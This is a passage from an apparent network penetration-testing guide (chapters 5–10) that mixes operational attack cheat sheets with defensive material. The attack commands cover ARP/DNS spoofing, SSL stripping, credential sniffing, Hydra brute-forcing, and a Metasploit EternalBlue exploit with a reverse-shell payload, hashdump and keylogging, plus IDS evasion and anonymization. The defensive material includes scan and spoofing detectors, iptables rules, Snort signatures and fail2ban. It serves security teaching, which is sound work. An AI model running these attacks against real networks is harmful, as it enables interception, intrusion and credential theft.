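    syns = defaultdict(list)       # src -> [(time, dst, dport, sport)]
    syn_acked = set()              # (client, server, client_port, server_port)
    completed = defaultdict(set)   # client -> {(server, server_port)}
    for ts, src, dst, sport, dport, flags in sorted(packets):
        f = set(flags)
        if f == {"S"}:                       # step 1: bare SYN
            syns[src].append((ts, dst, dport, sport))
        elif f == {"S", "A"}:                # step 2: server answers
            syn_acked.add((dst, src, dport, sport))
        elif f == {"A"} and (src, dst, sport, dport) in syn_acked:
            completed[src].add((dst, dport))  # step 3: client finishes

    alerts = []
    for src, attempts in syns.items():
        # Largest set of distinct targets seen inside any `window` seconds.
        best, start = set(), 0
        for end in range(len(attempts)):
            while attempts[end][0] - attempts[start][0] > window:
                start += 1
            targets = {(d, p) for _, d, p, _ in attempts[start:end + 1]}
            if len(targets) > len(best):
                best = targets
        if len(best) < min_targets:
            continue
        # A connect scan also scores low here: it only completes on open ports.
        ratio = len(best & completed[src]) / len(best)
        if ratio <= max_completion:
            answered = sorted(p for _, d, p, sp in attempts
                              if (src, d, sp, p) in syn_acked)
            alerts.append({
                "src": src,
                "targets": len(best),
                "completion": ratio,
                "open_ports_seen": answered,   # what the scanner learned
            })
    return alerts


if __name__ == "__main__":
    for a in detect_syn_scans(build_sample()):
        print(f"possible scan from {a['src']}: {a['targets']} targets, "
              f"completion {a['completion']:.0%}, open ports seen {a['open_ports_seen']}")
```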

✅ Chapter 5 Summary

  • Knowing Wireshark display filters lets you analyze any traffic
  • tcpdump = for headless capture on servers
  • Credentials are visible in plaintext in HTTP traffic
  • DNS queries show who a host is talking to
  • Automate custom packet analysis with Scapy
Chapter 06
🎭 MITM — Man-in-the-Middle
ARP Spoofing, DNS Spoofing, SSL Strip, MITM with Bettercap

🤔 How Does a MITM Attack Work?

Normally: Client → Router → Internet. With MITM: Client → Attacker → Router → Internet. The attacker in the middle can see and modify all traffic.

🥸 ARP Spoofing — Foundation of MITM

# With arpspoof (arpspoof package)

# Terminal 1: enable IP forwarding
$ echo 1 > /proc/sys/net/ipv4/ip_forward

# Terminal 2: tell the victim "I am the gateway"
$ arpspoof -i eth0 -t 192.168.1.50 192.168.1.1
#             ↑interface  ↑victim      ↑gateway

# Terminal 3: tell the gateway "I am the victim"
$ arpspoof -i eth0 -t 192.168.1.1 192.168.1.50

# Terminal 4: capture the victim's traffic
$ wireshark -i eth0 &
# or
$ tcpdump -i eth0 host 192.168.1.50 -w victim.pcap
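What the two-sided poisoning above looks like from a monitoring host, as an added example that is not part of the original guide: one MAC address starts answering for both the gateway and the victim, contradicting the bindings seen earlier. The record layout, function names and the optional `trusted` table (standing in for static entries or a DHCP snooping table, the data DAI relies on) are assumptions; the ARP replies are constructed and the MAC addresses are made up.

```python
from collections import defaultdict

# Constructed ARP replies: (time_s, sender_ip, sender_mac).
# IPs reuse this page's example gateway (192.168.1.1) and victim (192.168.1.50).
SAMPLE_REPLIES = [
    (1.0, "192.168.1.1", "00:11:22:33:44:01"),    # real gateway
    (2.0, "192.168.1.50", "00:11:22:33:44:50"),   # real victim
    (3.0, "192.168.1.77", "00:11:22:33:44:77"),   # unrelated host
    (10.0, "192.168.1.1", "DE:AD:BE:EF:00:66"),   # forged: "I am the gateway"
    (10.5, "192.168.1.50", "DE:AD:BE:EF:00:66"),  # forged: "I am the victim"
    (12.0, "192.168.1.1", "de:ad:be:ef:00:66"),
    (12.5, "192.168.1.50", "de:ad:be:ef:00:66"),
    (13.0, "192.168.1.1", "00:11:22:33:44:01"),   # real gateway still answers
]


def detect_arp_spoofing(replies, trusted=None):
    """Compare ARP replies against first-seen (or trusted) IP→MAC bindings.

    First-seen learning is blind if the forged reply arrives first, so pass
    known-good bindings in `trusted` where they exist. Legitimate changes
    (DHCP re-lease, gateway failover) also show up and need allow-listing.
    """
    bindings = {ip: mac.lower() for ip, mac in (trusted or {}).items()}
    claims = defaultdict(set)   # mac -> every IP it has answered for
    conflicts = {}              # ip -> details of contradicting replies
    for ts, ip, mac in sorted(replies):
        mac = mac.lower()
        claims[mac].add(ip)
        expected = bindings.setdefault(ip, mac)
        if mac != expected:
            c = conflicts.setdefault(ip, {
                "expected": expected,
                "rogue_macs": set(),
                "first_seen": ts,
                "count": 0,
            })
            c["rogue_macs"].add(mac)
            c["count"] += 1

    multi_ip = {mac: sorted(ips) for mac, ips in claims.items() if len(ips) > 1}
    # A MAC that contradicts the binding of two or more IPs is sitting
    # between them: the Client → Attacker → Router position.
    suspects = sorted(
        mac for mac, ips in multi_ip.items()
        if sum(mac in conflicts.get(ip, {}).get("rogue_macs", ()) for ip in ips) >= 2
    )
    return {"conflicts": conflicts, "multi_ip_macs": multi_ip, "mitm_suspects": suspects}


if __name__ == "__main__":
    report = detect_arp_spoofing(SAMPLE_REPLIES)
    for ip, c in report["conflicts"].items():
        print(f"{ip}: expected {c['expected']}, also claimed by "
              f"{sorted(c['rogue_macs'])} ({c['count']} replies)")
    print("MITM suspects:", report["mitm_suspects"])
```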

Bettercap — Modern MITM Framework

# Install
$ apt install bettercap
$ bettercap -h

# Interactive mode
$ bettercap -iface eth0

━━━ Bettercap Commands ━━━

# Network discovery
bettercap> net.probe on                          # Start network scan
bettercap> net.show                              # Show all hosts

# ARP Spoofing
bettercap> set arp.spoof.targets 192.168.1.50    # Victim IP
bettercap> arp.spoof on                          # Attack start

# HTTP/HTTPS sniffer
bettercap> http.proxy on                         # HTTP proxy intercept
bettercap> https.proxy on                        # HTTPS (SSL strip)

# Credential sniffer
bettercap> net.sniff on                          # Packet sniffing
bettercap> set net.sniff.verbose true

# DNS Spoofing
bettercap> set dns.spoof.domains facebook.com,google.com
bettercap> set dns.spoof.address 192.168.1.10    # Fake server IP
bettercap> dns.spoof on

# WiFi reconnaissance
bettercap> wifi.recon on                         # WiFi scan
bettercap> wifi.show                             # Show networks
bettercap> wifi.deauth AA:BB:CC:DD:EE:FF         # Deauth

# Caplet (automated script)
$ bettercap -iface eth0 -caplet mitm.cap

# mitm.cap file:
net.probe on
set arp.spoof.targets 192.168.1.0/24
arp.spoof on
net.sniff on
set net.sniff.regexp ".*password.*"

🌐 DNS Spoofing

# dnsspoof (classic)
# Create the /etc/dnsspoof.hosts file:
# 192.168.1.10 facebook.com
# 192.168.1.10 *.facebook.com
# 192.168.1.10 google.com
$ dnsspoof -i eth0 -f /etc/dnsspoof.hosts

# Fake web server setup (shows the victim a fake page)
$ service apache2 start
# Put the fake login page in /var/www/html/index.html

# responder (Windows environments)
$ responder -I eth0 -wFb
# LLMNR/NBT-NS poisoning → captures NTLMv2 hashes

🔐 SSL Strip — Downgrade HTTPS to HTTP

# sslstrip2 + bettercap
bettercap> set https.proxy.sslstrip true
bettercap> https.proxy on
bettercap> arp.spoof on

# Manual sslstrip
$ echo 1 > /proc/sys/net/ipv4/ip_forward
$ iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
$ sslstrip -l 8080 -w sslstrip.log &
$ arpspoof -i eth0 -t victim_ip gateway_ip

# View the log
$ tail -f sslstrip.log | grep -i "password\|login\|user"

# Note: SSL Strip does not work when HSTS is in effect in modern browsers
# HSTS Preloaded sites: google.com, facebook.com → safe

✅ Chapter 6 Summary

  • ARP Spoof = the core technique of MITM
  • Bettercap = all MITM tools in one place
  • DNS Spoof = take the victim to a fake site
  • SSL Strip = HTTPS → HTTP downgrade (does not work against HSTS)
Chapter 07
⚔️ Network Service Attacks
FTP, SSH, Telnet, SMB, RDP — attacks and exploitation of all services

🔑 Hydra — Network Login Bruteforcer

# SSH brute force
$ hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.1
$ hydra -L users.txt -P pass.txt ssh://192.168.1.1 -t 4

# FTP brute force
$ hydra -l admin -P pass.txt ftp://192.168.1.1
$ hydra -l anonymous -p "" ftp://192.168.1.1     # Anonymous

# Telnet
$ hydra -l root -P pass.txt telnet://192.168.1.1

# HTTP Form brute force
$ hydra -l admin -P pass.txt 192.168.1.1 http-post-form \
    "/login.php:user=^USER^&pass=^PASS^:Invalid credentials"

# RDP brute force
$ hydra -l administrator -P pass.txt rdp://192.168.1.1

# SMB brute force
$ hydra -l administrator -P pass.txt smb://192.168.1.1

# MySQL
$ hydra -l root -P pass.txt mysql://192.168.1.1

# Options
$ hydra -t 16    # 16 parallel tasks
$ hydra -V       # Verbose (show every attempt)
$ hydra -f       # Stop at the first match found

📂 SMB — Windows File Sharing

# SMB enumeration
$ smbclient -L //192.168.1.1 -N              # Anonymous share list
$ smbclient -L //192.168.1.1 -U admin        # With credentials
$ smbmap -H 192.168.1.1                      # Show share permissions
$ smbmap -H 192.168.1.1 -u admin -p pass

# enum4linux — Windows/Samba enumeration
$ enum4linux -a 192.168.1.1                  # All info
$ enum4linux -U 192.168.1.1                  # Users
$ enum4linux -S 192.168.1.1                  # Shares
$ enum4linux -P 192.168.1.1                  # Password policy

# Connect with smbclient
$ smbclient //192.168.1.1/Share -U admin%password
smb> ls                  # List files
smb> get secret.txt      # File download
smb> put exploit.exe     # File upload
smb> cd /                # Directory change

# Nmap SMB scripts
$ nmap --script=smb-vuln-ms17-010 192.168.1.1    # EternalBlue check
$ nmap --script=smb-vuln-ms08-067 192.168.1.1
$ nmap --script=smb-enum-shares 192.168.1.1
$ nmap --script=smb-enum-users 192.168.1.1

# CrackMapExec — Windows network auditing
$ crackmapexec smb 192.168.1.0/24                        # Discovery
$ crackmapexec smb 192.168.1.1 -u admin -p pass
$ crackmapexec smb 192.168.1.1 --shares                  # Shares
$ crackmapexec smb 192.168.1.1 -u admin -p pass --sam    # SAM dump

🖥️ RDP Attacks

# RDP scan and check
$ nmap -p 3389 --script=rdp-vuln-ms12-020 192.168.1.1
$ nmap -p 3389 --script=rdp-enum-encryption 192.168.1.1

# RDP brute force
$ hydra -l administrator -P rockyou.txt rdp://192.168.1.1 -t 1
$ crowbar -b rdp -s 192.168.1.1/32 -u administrator -C pass.txt

# Connect with xfreerdp
$ xfreerdp /u:administrator /p:password /v:192.168.1.1
$ xfreerdp /u:admin /p:pass /v:192.168.1.1 /cert:ignore

💻 Metasploit — Exploitation Framework

# Start Metasploit
$ msfdb init        # Database init
$ msfconsole        # Start

━━━ Metasploit Basic Commands ━━━
msf> help
msf> search eternalblue                               # Find a module
msf> use exploit/windows/smb/ms17_010_eternalblue
msf> show options                                     # Show required options
msf> set RHOSTS 192.168.1.50                          # Target IP
msf> set LHOST 192.168.1.100                          # Our IP
msf> set LPORT 4444                                   # Listen port
msf> set payload windows/x64/meterpreter/reverse_tcp
msf> run                                              # Execute

# Meterpreter commands (after a successful exploit)
meterpreter> sysinfo                                  # System info
meterpreter> getuid                                   # Current user
meterpreter> getsystem                                # Privilege escalation
meterpreter> hashdump                                 # Password hashes
meterpreter> shell                                    # CMD shell
meterpreter> upload file.exe C:\\Windows\\Temp\\
meterpreter> download secret.txt /tmp/
meterpreter> keyscan_start                            # Keylogger
meterpreter> screenshot                               # Screenshot
meterpreter> run post/multi/recon/local_exploit_suggester

# Useful modules
msf> use auxiliary/scanner/portscan/tcp               # Port scanner
msf> use auxiliary/scanner/smb/smb_ms17_010           # EternalBlue check
msf> use auxiliary/scanner/ssh/ssh_login              # SSH brute
msf> use auxiliary/scanner/ftp/ftp_login              # FTP brute
msf> use post/windows/gather/credentials/credential_collector

✅ Chapter 7 Summary

  • Use Hydra to brute force SSH/FTP/HTTP/RDP/SMB
  • SMB = the riskiest service on Windows
  • Metasploit = the standard tool for exploitation
  • Meterpreter = the best shell for post-exploitation
Chapter 08
🔥 Firewall & IDS Evasion
Firewall bypass techniques, IDS detection evasion, tunneling

🔥 iptables — Linux Firewall

# Show rules
$ iptables -L -n -v --line-numbers

# Basic rules (checked top to bottom; the first match wins)
$ iptables -A INPUT -s 192.168.1.50 -j DROP         # Block IP (must come before the ACCEPT rules)
$ iptables -A INPUT -p tcp --dport 22 -j ACCEPT     # SSH allow
$ iptables -A INPUT -p tcp --dport 80 -j ACCEPT     # HTTP allow
$ iptables -A INPUT -j DROP                         # Else drop

# Detect a firewall with Nmap
$ nmap -sA 192.168.1.1                # ACK scan → shows filtered/unfiltered
$ nmap -sW 192.168.1.1                # Window scan
$ nmap --traceroute 192.168.1.1

# Firewall bypass techniques
$ nmap -f 192.168.1.1                 # Fragment packets
$ nmap -D RND:10 192.168.1.1          # Decoy scan
$ nmap --source-port 53 target        # Source port 53 (DNS)
$ nmap --source-port 80 target        # Source port 80 (HTTP)
$ nmap -T1 --scan-delay 5s target     # Slow scan

🕳️ Port Tunneling

# SSH Local Port Forwarding
# Firewall blocked 3306 (MySQL) — 22 (SSH) open
$ ssh -L 3307:127.0.0.1:3306 user@remote_server
# Now localhost:3307 = remote:3306
$ mysql -h 127.0.0.1 -P 3307 -u root -p

# SSH Remote Port Forwarding
$ ssh -R 4444:127.0.0.1:4444 user@remote_server
# Port 4444 on the remote server = our localhost:4444

# SSH Dynamic (SOCKS Proxy)
$ ssh -D 1080 user@remote_server
# SOCKS5 for the browser/tool = 127.0.0.1:1080

# Tunnel any tool with Proxychains
$ nano /etc/proxychains4.conf
# [ProxyList]
# socks5 127.0.0.1 1080
$ proxychains nmap -sT -p 80,443 target
$ proxychains curl http://target.com
$ proxychains hydra -l root -P pass.txt ssh://target

🧅 Tor & Anonymity

# Install and start Tor
$ apt install tor
$ service tor start
$ service tor status
# Tor SOCKS5 = 127.0.0.1:9050
$ proxychains curl https://check.torproject.org

# torify — run through Tor
$ torify curl http://target.com
$ torify nmap -sT target

# torghost — route all traffic through Tor
$ torghost -s      # Start
$ torghost -x      # Stop
$ torghost -ip     # Show current IP

# MAC address spoof (avoid physical tracking)
$ macchanger -r wlan0                       # Random MAC
$ macchanger -m 00:11:22:33:44:55 wlan0     # Custom MAC
$ ip link set wlan0 down
$ macchanger -r wlan0
$ ip link set wlan0 up

✅ Chapter 8 Summary

  • Manage Linux firewall rules with iptables
  • Detect the firewall type with Nmap -sA
  • SSH tunneling = bypass a port blocked by the firewall
  • Proxychains = run any tool anonymously
  • macchanger = hide your physical identity
Chapter 09
🔒 VPN & Tunneling
OpenVPN, WireGuard, SSH Tunneling, Proxychains — Complete Guide

🌐 How Does a VPN Work?

A VPN creates an encrypted tunnel through which traffic passes. An ISP or network admin cannot see the traffic inside it. You need to understand VPNs to keep yourself anonymous during security testing.

WireGuard — Modern VPN

# WireGuard install
$ apt install wireguard

# Create a key pair (umask 077 keeps the private key file readable by its owner only)
$ umask 077
$ wg genkey | tee privatekey | wg pubkey > publickey
$ cat privatekey publickey

# Server config: /etc/wireguard/wg0.conf
# (the server also needs IPv4 forwarding enabled, net.ipv4.ip_forward=1, for the NAT rules to pass client traffic)
[Interface]
Address = 10.0.0.1/24
PrivateKey = <SERVER_PRIVATE_KEY>
ListenPort = 51820
PostUp = iptables -A FORWARD -i wg0 -j ACCEPT; iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
PostDown = iptables -D FORWARD -i wg0 -j ACCEPT; iptables -t nat -D POSTROUTING -o eth0 -j MASQUERADE

[Peer]
PublicKey = <CLIENT_PUBLIC_KEY>
AllowedIPs = 10.0.0.2/32

# Client config
[Interface]
Address = 10.0.0.2/24
PrivateKey = <CLIENT_PRIVATE_KEY>
DNS = 8.8.8.8

[Peer]
PublicKey = <SERVER_PUBLIC_KEY>
Endpoint = server_ip:51820
AllowedIPs = 0.0.0.0/0     # All traffic through VPN

# Start/Stop
$ wg-quick up wg0
$ wg-quick down wg0
$ wg show                  # Status

🔗 SSH Tunneling — For Everything

━━━ SSH TUNNELING CHEATSHEET ━━━

# 1. Local Port Forward (my port → remote service)
$ ssh -L local_port:target_host:target_port user@jump_server
# Example: access a remote MySQL
$ ssh -L 3307:192.168.2.5:3306 user@192.168.1.1
$ mysql -h 127.0.0.1 -P 3307     # Now access!

# 2. Remote Port Forward (remote port → my service)
$ ssh -R remote_port:local_host:local_port user@remote
# Example: reverse shell from behind NAT
$ ssh -R 4444:localhost:4444 user@my_vps

# 3. Dynamic SOCKS Proxy
$ ssh -D 1080 user@proxy_server
# SOCKS5 127.0.0.1:1080 → all traffic is routed through it

# 4. Jump Host (Bastion)
$ ssh -J jump_user@jump_host target_user@final_target
# In ~/.ssh/config:
Host final_target
    ProxyJump jump_user@jump_host
    User target_user

# 5. Multiple hops
$ ssh -J user1@hop1,user2@hop2 user3@destination

# Run in the background
$ ssh -fNL 3307:127.0.0.1:3306 user@server     # -f=background, -N=no command
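Whether a server honors these tunnel modes is decided by a few sshd_config keywords. The Python below is an added example, not part of the original guide: it reads a config and reports which of the cheat sheet's ssh options the server would allow. The sample configs are constructed, and Match blocks are not evaluated.

```python
# OpenSSH's documented defaults for the keywords that govern TCP forwarding.
DEFAULTS = {"allowtcpforwarding": "yes", "gatewayports": "no",
            "disableforwarding": "no"}

def global_settings(config_text):
    """Effective values outside Match blocks. sshd keeps the FIRST value it
    reads for a keyword, so a later duplicate line does not override it."""
    seen = {}
    for raw in config_text.splitlines():
        parts = raw.split("#", 1)[0].split(None, 1)
        if not parts:
            continue                  # blank line or comment
        key = parts[0].lower()        # keywords are case-insensitive
        if key == "match":
            break                     # per-user/host overrides are out of scope
        if key in DEFAULTS and key not in seen and len(parts) == 2:
            seen[key] = parts[1].strip().lower()
    return {**DEFAULTS, **seen}

def allowed_tunnels(settings):
    """Which of the cheat sheet's ssh options this server would honor."""
    tcp = settings["allowtcpforwarding"]
    if settings["disableforwarding"] == "yes":
        tcp = "no"                    # overrides every other forwarding keyword
    local = tcp in ("yes", "all", "local")
    remote = tcp in ("yes", "all", "remote")
    return {
        "-L": local,     # local forward
        "-D": local,     # SOCKS proxy: opens the same channel type as -L
        "-J": local,     # jump host: the bastion opens a TCP channel for the client
        "-R": remote,    # remote forward
        "-R on all interfaces": remote and settings["gatewayports"] != "no",
    }

# Constructed configs (not from a real server).
DEFAULT_CONFIG = """\
# stock file: the keywords are commented out, so the defaults apply
#AllowTcpForwarding yes
#GatewayPorts no
"""

BASTION_CONFIG = """\
# jump host: allow -J/-L/-D, refuse -R
AllowTcpForwarding local
# ignored, because the first value wins
AllowTcpForwarding yes
GatewayPorts no
Match User backup
    AllowTcpForwarding no
"""

LOCKED_CONFIG = "DisableForwarding yes\nAllowTcpForwarding yes\n"

if __name__ == "__main__":
    for name in ("DEFAULT_CONFIG", "BASTION_CONFIG", "LOCKED_CONFIG"):
        print(name, allowed_tunnels(global_settings(globals()[name])))
```

On a live host, `sshd -T` prints the effective configuration and is the authoritative check.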

✅ Chapter 9 Summary

  • WireGuard = fastest, modern VPN — build your own VPN server
  • SSH Local Tunnel = access a blocked port
  • SSH Remote Tunnel = reverse connection from behind NAT
  • SSH Dynamic = SOCKS proxy → use it with Proxychains
Chapter 10
🛡️ Network Defense & Hardening
Firewall setup, IDS/IPS, WiFi hardening, network monitoring — all defense techniques

🔥 iptables Hardening

# Default policy: block everything
# (on a remote session, add the ACCEPT rules first so the policy change does not cut you off)
$ iptables -P INPUT DROP
$ iptables -P FORWARD DROP
$ iptables -P OUTPUT ACCEPT                                          # Outgoing allow

# Loopback allow
$ iptables -A INPUT -i lo -j ACCEPT

# Established connections allow
$ iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT

# Rules are checked top to bottom and the first match wins,
# so the DROP and rate-limit rules go before the service ACCEPT rules.

# Port scan protection
$ iptables -A INPUT -p tcp --tcp-flags ALL NONE -j DROP              # NULL scan
$ iptables -A INPUT -p tcp --tcp-flags ALL ALL -j DROP               # Xmas scan
$ iptables -A INPUT -p tcp --tcp-flags SYN,FIN SYN,FIN -j DROP

# SYN flood protection: SYNs within the limit continue to the service rules, the rest are logged and dropped
# (a rate-limited "-j ACCEPT" here would accept SYNs to every port)
$ iptables -N SYN_LIMIT
$ iptables -A SYN_LIMIT -m limit --limit 1/s --limit-burst 3 -j RETURN
$ iptables -A SYN_LIMIT -j LOG --log-prefix "DROPPED: " --log-level 4
$ iptables -A SYN_LIMIT -j DROP
$ iptables -A INPUT -p tcp --syn -j SYN_LIMIT

# Specific services allow
$ iptables -A INPUT -p tcp --dport 22 -s 192.168.1.0/24 -j ACCEPT    # SSH from LAN only
$ iptables -A INPUT -p tcp --dport 80 -j ACCEPT                      # HTTP
$ iptables -A INPUT -p tcp --dport 443 -j ACCEPT                     # HTTPS

# Ping flood protection
$ iptables -A INPUT -p icmp --icmp-type echo-request -m limit --limit 1/s -j ACCEPT

# Log blocked packets
$ iptables -A INPUT -j LOG --log-prefix "DROPPED: " --log-level 4

# Save rules
$ iptables-save > /etc/iptables/rules.v4
$ iptables-restore < /etc/iptables/rules.v4

🚨 Snort/Suricata — IDS/IPS

# Snort install
$ apt install snort

# Basic run
$ snort -i eth0 -A console            # Console output
$ snort -i eth0 -l /var/log/snort

# Custom Snort rules (/etc/snort/rules/local.rules)
# Rule format: action protocol src_ip src_port -> dst_ip dst_port (options)

# Port scan detect
alert tcp any any -> $HOME_NET any (msg:"Port Scan Detected"; flags:S; threshold: type both, track by_src, count 20, seconds 10; sid:1000001;)

# SSH brute force detect (flags:S counts new connection attempts, not every packet of one session)
alert tcp any any -> $HOME_NET 22 (msg:"SSH Brute Force"; flow:to_server; flags:S; threshold: type both, track by_src, count 5, seconds 60; sid:1000002;)

# Nmap scan detect
alert tcp any any -> $HOME_NET any (msg:"Nmap SYN Scan"; flags:S; threshold: type both, track by_src, count 100, seconds 5; sid:1000003;)

# Suricata (faster, multi-threaded)
$ apt install suricata
$ suricata -i eth0 -l /var/log/suricata
$ suricata-update                     # Rules update
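The iptables LOG rule writes blocked packets to the kernel log with the `DROPPED: ` prefix, which gives a second place to apply the port-scan threshold from the Snort rule (20 in 10 seconds). The Python below is an added example, not part of the original guide: it counts distinct destination ports per source rather than raw SYN packets, and the log lines, host name and addresses are constructed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Netfilter LOG line carrying the 'DROPPED: ' prefix; only TCP fields are used.
LINE_RE = re.compile(
    r"(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) .*DROPPED: .*?"
    r"SRC=(?P<src>\S+) .*?PROTO=TCP .*?DPT=(?P<dpt>\d+)"
)

def parse_line(line, year=2024):
    """Return (timestamp, source IP, destination port), or None for other lines."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    # Syslog timestamps carry no year, so one is assumed.
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["src"], int(m["dpt"])

def detect_scans(lines, min_ports=20, window=10):
    """Map each source that hit >= min_ports distinct ports within `window`
    seconds to the largest number of distinct ports seen in one window."""
    recent = defaultdict(deque)       # src -> (timestamp, port) inside the window
    flagged = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ts, src, port = rec
        q = recent[src]
        q.append((ts, port))
        while (ts - q[0][0]).total_seconds() > window:
            q.popleft()               # expire events older than the window
        distinct = len({p for _, p in q})
        if distinct >= min_ports:
            flagged[src] = max(flagged.get(src, 0), distinct)
    return flagged

def make_line(sec, src, dpt):
    """Build one constructed log line in the kernel's LOG-target format."""
    return (f"Jan 10 12:00:{sec:02d} fw kernel: DROPPED: IN=eth0 OUT= SRC={src} "
            f"DST=192.168.1.1 LEN=44 TTL=64 PROTO=TCP SPT=40000 DPT={dpt} SYN URGP=0")

# Constructed traffic: a fast scanner, a client retrying one closed port,
# and a slow prober that stays under the threshold.
_events = (
    [(p // 5, "192.168.1.50", 1000 + p) for p in range(25)]
    + [(s, "192.168.1.77", 445) for s in range(30)]
    + [(2 * i, "192.168.1.88", 2000 + i) for i in range(25)]
)
SAMPLE_LINES = [make_line(*e) for e in sorted(_events)]

if __name__ == "__main__":
    for src, ports in detect_scans(SAMPLE_LINES).items():
        print(f"possible port scan from {src}: {ports} distinct ports within 10 s")
```

The slow prober shows the limit of any fixed threshold: it only appears once the port count is lowered or the window is widened.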

📶 WiFi Security Hardening

════ Router/AP Security Checklist ════
[✓] Enable WPA3 (or WPA2-AES at minimum)
[✓] Disable WPS — router settings → WPS = OFF
[✓] Strong password: 20+ characters, random
      Bad:  "MyNetwork123"
      Good: "j8#Kp2@mX9$vL5!qR3nW"
[✓] Change the router admin password (not admin/admin)
[✓] Disable remote management
[✓] Keep the guest network on a separate VLAN
[✓] Enable MAC filtering (extra layer)
[✓] Hide SSID broadcast (obscurity only, not security)
[✓] Keep the firmware updated
[✓] Lower the transmit power (limit the range)
[✓] Use the 5GHz band (shorter range)

════ WPA2 Password Testing ════
# Test the password strength of your own network
$ aircrack-ng -w /usr/share/wordlists/rockyou.txt handshake.cap
# If it is found → change the password!

════ Rogue AP Detection ════
$ airodump-ng wlan0mon
# Multiple APs with the same SSID are suspicious
$ waidps                   # Wireless attack detection
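The "multiple APs with the same SSID" check can be automated against the CSV file that airodump-ng writes with `-w`. The Python below is an added example, not part of the original guide: it compares each AP advertising one of your SSIDs against an inventory of the radios you own and notes when the unknown AP offers different encryption. The capture, BSSIDs, SSIDs and the `KNOWN_APS` inventory are constructed.

```python
# Constructed airodump-ng CSV output; every BSSID and SSID here is made up.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
AA:BB:CC:DD:EE:FF, 2024-01-10 12:00:00, 2024-01-10 12:05:00,  6,  54, WPA2, CCMP, PSK, -45, 120, 45,   0.  0.  0.  0,  13, MyHomeNetwork,
AA:BB:CC:DD:EE:F0, 2024-01-10 12:00:00, 2024-01-10 12:05:00, 36, 130, WPA2, CCMP, PSK, -60,  80,  0,   0.  0.  0.  0,  13, MyHomeNetwork,
02:11:22:33:44:55, 2024-01-10 12:03:00, 2024-01-10 12:05:00,  6,  54, OPN, , , -30,  40,  0,   0.  0.  0.  0,  13, MyHomeNetwork,
10:20:30:40:50:60, 2024-01-10 12:00:00, 2024-01-10 12:05:00, 11,  54, WPA2, CCMP, PSK, -70,  60,  0,   0.  0.  0.  0,  11, Cafe, Guest,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
66:77:88:99:AA:BB, 2024-01-10 12:01:00, 2024-01-10 12:05:00, -50, 30, AA:BB:CC:DD:EE:FF, MyHomeNetwork
"""

# Hypothetical inventory: the access points you actually own, per SSID.
KNOWN_APS = {"MyHomeNetwork": {"AA:BB:CC:DD:EE:FF", "AA:BB:CC:DD:EE:F0"}}

def parse_aps(csv_text):
    """Parse the access-point section of the CSV into a list of dicts."""
    aps = []
    for line in csv_text.splitlines():
        if line.startswith("Station MAC"):
            break                     # the client section follows; not needed here
        parts = line.split(",", 13)   # 13 fixed fields, then "ESSID, Key"
        if len(parts) < 14 or parts[0].strip() == "BSSID":
            continue                  # blank line or header
        # An ESSID may itself contain commas, so cut off only the final Key field.
        essid = parts[13].rsplit(",", 1)[0].strip()
        aps.append({"bssid": parts[0].strip().upper(), "channel": int(parts[3]),
                    "privacy": parts[5].strip(), "essid": essid})
    return aps

def find_rogue_aps(csv_text, known):
    """Return (essid, bssid, channel, privacy, encryption_differs) for every AP
    that advertises one of our SSIDs from a BSSID missing from the inventory."""
    aps = parse_aps(csv_text)
    findings = []
    for ap in aps:
        owned = known.get(ap["essid"])
        if owned is None or ap["bssid"] in owned:
            continue                  # not our SSID, or one of our own radios
        expected = {a["privacy"] for a in aps
                    if a["essid"] == ap["essid"] and a["bssid"] in owned}
        findings.append((ap["essid"], ap["bssid"], ap["channel"], ap["privacy"],
                         ap["privacy"] not in expected))
    return findings

if __name__ == "__main__":
    for essid, bssid, ch, privacy, differs in find_rogue_aps(SAMPLE_CSV, KNOWN_APS):
        print(f"unknown AP for {essid!r}: {bssid} ch {ch} {privacy} differs={differs}")
```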

📊 Network Monitoring

# Fail2Ban — brute force protection
$ apt install fail2ban
$ systemctl enable fail2ban

# /etc/fail2ban/jail.local
# (comments sit on their own lines: fail2ban does not strip a "#" comment that follows a value)
[sshd]
enabled = true
port = ssh
# 3 failed attempts
maxretry = 3
# 1 hour ban
bantime = 3600
# 10 minute window
findtime = 600

# apache-auth is the stock jail for Apache HTTP auth failures (on nginx: nginx-http-auth);
# a jail name with no matching filter, such as "http-auth", fails to load
[apache-auth]
enabled = true
maxretry = 5
# 24 hour ban
bantime = 86400

# Show status
$ fail2ban-client status
$ fail2ban-client status sshd
$ fail2ban-client unban 192.168.1.50

# auditd — system call monitoring
$ apt install auditd
$ auditctl -w /etc/passwd -p rwa      # Monitor the passwd file
$ auditctl -w /etc/shadow -p rwa
$ ausearch -f /etc/passwd             # View the log

# Network traffic monitoring
$ iftop -i eth0                       # Real-time bandwidth
$ nethogs eth0                        # Per-process bandwidth
$ ntopng                              # Web-based monitor
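How `maxretry`, `findtime` and `bantime` interact is easiest to see by replaying a log against them. The Python below is an added example, not fail2ban's own code: a simplified model of the `[sshd]` jail settings above, run over constructed auth.log lines, with the year assumed because syslog timestamps omit it.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# sshd failure lines as they appear in auth.log ("invalid user" is optional).
FAIL_RE = re.compile(
    r"(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?\S+ from (?P<ip>\S+) port \d+"
)

# Constructed sample log (not from a real host).
SAMPLE_LOG = """\
Jan 10 12:00:01 srv sshd[2001]: Failed password for root from 192.168.1.50 port 40001 ssh2
Jan 10 12:00:03 srv sshd[2002]: Failed password for root from 192.168.1.50 port 40002 ssh2
Jan 10 12:00:04 srv sshd[2003]: Failed password for invalid user admin from 192.168.1.50 port 40003 ssh2
Jan 10 12:00:05 srv sshd[2004]: Failed password for root from 192.168.1.50 port 40004 ssh2
Jan 10 12:01:00 srv sshd[2005]: Failed password for alice from 192.168.1.20 port 50000 ssh2
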